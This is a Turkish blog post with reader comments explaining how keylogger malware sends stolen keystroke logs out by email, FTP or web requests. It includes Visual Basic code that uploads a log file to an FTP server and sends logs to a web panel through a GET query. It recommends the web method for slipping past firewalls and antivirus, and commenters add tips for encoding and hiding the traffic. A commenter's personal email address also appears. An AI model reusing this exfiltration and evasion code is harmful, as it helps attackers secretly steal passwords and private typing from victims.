Yazıya öncelikle keylogger’ın tanımını yaparak başlayayım. Keylogger; bir bilgisayarda basılan tuşları kayıt altına alan, sonra o kayıtları dışarı yollayan zararlı programlara verilen isimdir. Zararlı program diyorum fakat her zaman kötü alanlarda kullanılmasına gerek yok. Bu yazımda log depolayan keyloggerların kayıtlarını(log) dışarı aktarma mantıklarından bahsedeceğim.
E-Posta Yoluyla
En sağlam yol olarak gözükse de artık eskisi kadar tercih edilmiyor. Bunun çeşitli sebepleri var. İlk sebebi kodlama mantığının zorlayıcı olması. İkinci sebebi de kullanılan smtp sunucularının bu durumu algılayıp trafiği engellemesi. Ayrıca firewall’ların da en çok yakaladıkları yöntem e-posta yöntemidir. Tavsiye etmem
Ftp’ye Yükleyerek
Günümüzde en çok kullanılan kayıt gönderme mantığı ftp’ye kayıt dosyasını yüklemektir. Örneğin C dizinine kayıtları log.txt halinde saklamış olsun. Bunu kendi ftp adresimize göndereceğiz. Visual Basic dilinde şöyle bir örnekle gösterebilirim
Private Sub Command1_Click()
Inet1.URL = "Ftp://utkusoft.com" ' Sitenin adresi
Inet1.UserName = "utku" ' Ftp kullanıcı adın
Inet1.Password = "1234" ' Ftp parolan
Inet1.Execute , "SEND C:\\log.txt logger.txt"
'log.txt'yi al logger.txt olarak ftp'ye at
Do While Inet1.StillExecuting ' eğer dosya yüklesemesi hâla devam ediyorsa aynı işleme devam et.
DoEvents ' işlemleri yap
Loop
End Sub
Ancak ben bunu da pek önermiyorum. Çünkü herhangi bir hex editörle keylogger incelendiğinde ftp kullanıcı adı ve şifresi bulunabilir, kayıtlar herkes tarafından görülebilir. Firewall ve antivirüsler kısa sürede bu keyloggerı zararlı yazılım ilan edecektir
Web Sitesine Sorgu Olarak Göndererek
En güzelini en sona sakladım. Bu mantıkta kayıt dosyasını bilgisayarda herhangi bir yere kaydetmemiz de gerekmiyor. Text nesnesinde depolamanız yeterli. Daha sonra yapacağınız işlem şu. Get sorgusuyla gelen verileri veritabanına yazdıran bir kodumuz olsun. Örneğin şöyle
log.asp?yaz= (buradan sonra gelen verileri veritabanına kayıt etsin)
Visual Basic’de şu küçük kod parçasıyla kayıtlarımızı web panelimize yollayabiliriz
Webbrowser1.Navigate "http://utkusoft.com/log.asp?yaz=Text1.Text"
Bunun için size gerekli olan asp kodlarını şuradan indirebilirsiniz. Bu şekilde loglarınızı web panelinize kolayca aktarıp okuyabilirsiniz. Firewall ve antivirüslerin de yakalaması daha zor olacaktır. Benim tavsiyem bu yöntemdir
Web sayfasına Log göndermede Query String degilde, Post Method’u kullanılsaydı daha sağlam olurdu kanımca.Nedeni ise, Bazı stringler (örneğin satır atlama) QueryStringde farklı karakterlerle gösteriliyor.İlla Querstring diyorsanız, Bunuda şöle çözebilirsiniz aslında, Gönderilecek veriyi Base64 Encode yöntemiyle encode edersiniz (Veya farklı bi şifreleme ;) Daha sonra veri’leri okuyacak olan sayfa ile Decode işlemini yaparsınız bu sayede Bazı karakterler korunmuş olur kanımca.
ve bişi daha, web browser Objesi kullandığınız için sayfa her yenilendiğinde çıkacak olan “çık” sesi insanı rahatsız edebiliyor =)
o sesi engellemek kolay bir şey
Okumak takip etmek güzel şey. insanın tasarım dünyaında bilmediği o kadar çok şey var ki. Her blog dan bir şeyler öğreniyorsun
paylaşım için tşk
Paylaşım için teşekkürler utku..
Mrb
Peki benim bilgisayarıma keyloger bulaştı benim bilgisayarımdan gönderilen logların hangi siteye yada ftpye gönderildiğini nasıl öğrenebilirim reg kayıtları yada e-posta gönderme mantığını yada bunu öğrenebileceğim bir Yol biliyorsanız bana yazarmısınız.
adresim bekliyorum.
nakolik@hotmail.com
Mrb. Utku
Bilgisayara Bulanşan keyloger Bir Ftp’ye weri gönderiyor bunu gönderdiği yeri nasıl bulabilirim yardımcı olur musun.